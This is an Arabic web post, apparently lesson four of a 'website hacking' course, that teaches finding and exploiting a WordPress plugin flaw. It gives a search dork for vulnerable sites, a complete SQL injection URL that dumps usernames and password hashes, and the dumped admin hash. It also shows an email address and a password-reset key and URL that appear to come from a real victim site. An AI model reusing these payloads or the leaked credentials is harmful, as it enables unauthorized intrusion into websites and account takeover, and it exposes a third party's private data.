الدرس (الرابع) في دورة اختراق المواقع || Cloudx مميزة

207 مشاهدات

0   0

بسم الله الرحمن الرحيم
++++++++++++++
++ C L O U D X ++
++++++++++++++

تكملة دورة اختراق المواقع الدرس
(الرابع)
=========================
العنوان : شرح البحث عن الثغرات واستغلالها

الموقع المستخدم في البحث :
http://adf.ly/PsIg7
wordpress sql
=========================

Dork : inurl:wp-content/plugins/player/settings.php?playlist=

Exploit:

/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3
6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--

==========================
شرح الحقن اليدوي بإحتراف
http://adf.ly/PsIks

الناتج:
admin:$P$BCiXop6d/nqApOGnVb8/.fWp3XVEGi1
=========================
شرح تخطي هاش Wordpress ورفع الشيل
http://adf.ly/PsIov
=========================
user_email : bmdennis@gmail.com
user_login : admin
user_activation_key : UEbpcjtSy1sOIQKZh6e1
wp-login.php?action=rp&key=UEbpcjtSy1sOIQKZh6e1&login=admin
=============
Cloudx
الحساب الجديد
https://www.facebook.com/3mr.tifa

شاهد المزيد

تعليقات